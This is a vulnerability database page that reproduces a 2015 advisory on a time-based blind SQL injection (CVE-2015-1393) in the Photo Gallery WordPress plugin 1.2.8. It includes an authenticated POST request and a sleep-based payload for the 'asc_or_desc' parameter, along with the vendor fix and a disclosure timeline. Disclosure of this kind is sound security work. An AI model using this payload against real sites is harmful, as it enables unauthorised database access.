| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| WordPress Photo Gallery 1.2.8 XSS / SQL Injection Vulnerabilities | 29 Jan 201500:00 | – | zdt | |
| WordPress Plugin Photo Gallery 'asc_or_desc' Parameter SQL Injection Vulnerability | 30 Jan 201500:00 | – | cnvd | |
| CVE-2015-1393 | 2 Feb 201515:00 | – | cve | |
| CVE-2015-1393 | 2 Feb 201515:00 | – | cvelist | |
| EUVD-2015-1530 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-1393 | 2 Feb 201515:59 | – | nvd | |
| WordPress Photo Gallery plugin <= 1.2.100 - SQL Injection | 27 Jan 201500:00 | – | patchstack | |
| Sql injection | 2 Feb 201515:59 | – | prion | |
| [CVE-2015-1393] Photo Gallery (Wordpress Plugin) - SQL Injection in Version 1.2.8 | 2 Feb 201500:00 | – | securityvulns | |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 2 Feb 201500:00 | – | securityvulns |
`[CVE-2015-1393] Photo Gallery (Wordpress Plugin) - SQL Injection in Version 1.2.8
----------------------------------------------------------------
Product Information:
Software: Photo Gallery (Wordpress Plugin)
Tested Version: 1.2.8, released on 15.01.2015 and has over half a million downloads.
Vulnerability Type: SQL Injection (CWE-89)
Download link to tested version: https://downloads.wordpress.org/plugin/photo-gallery.1.2.8.zip
Description: Photo Gallery is an advanced plugin with a list of tools and options for adding and editing images for different views. It is fully responsive. The product includes plugin for adding image galleries and albums to posts and pages, as well as multiple widgets. You can add images, providing detailed descriptions and tags, organize the galleries into different albums. (copied from https://wordpress.org/plugins/photo-gallery/)
----------------------------------------------------------------
Vulnerability description:
When an authenticated user is creating a new gallery a POST-request is sent to the application that is prone to SQL-Injection in the parameter "asc_or_desc".
POST /wordpress/wp-admin/admin.php?page=galleries_bwg HTTP/1.1
Host: <IP>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <Wordpress-Cookie>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
search_value=&page_number=1&search_or_not=&task=add¤t_id=&ids_string=&asc_or_desc=asc&order_by=order
The parameter asc_or_desc in the POST body is prone to a AND/OR time-based blind SQL-Injection. WIth the following payload a delay can be provoked in the request of additional 10 seconds:
asc_or_desc=asc%2c(select%20*%20from%20(select(sleep(10)))a)
----------------------------------------------------------------
Impact:
Direct database access will be possible if an attacker is exploiting the SQL Injection vulnerability.
----------------------------------------------------------------
Solution:
Update to the latest version, which is 1.2.11, see https://wordpress.org/plugins/photo-gallery/.
----------------------------------------------------------------
Timeline:
Vulnerability found: 20.01.2015
Vendor informed: 21.01.2015
Response by vendor: 23.01.2015
Fix by vendor 25.01.2015
Public Advisory: 28.01.2015
----------------------------------------------------------------
Regards,
Sven Schleier
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation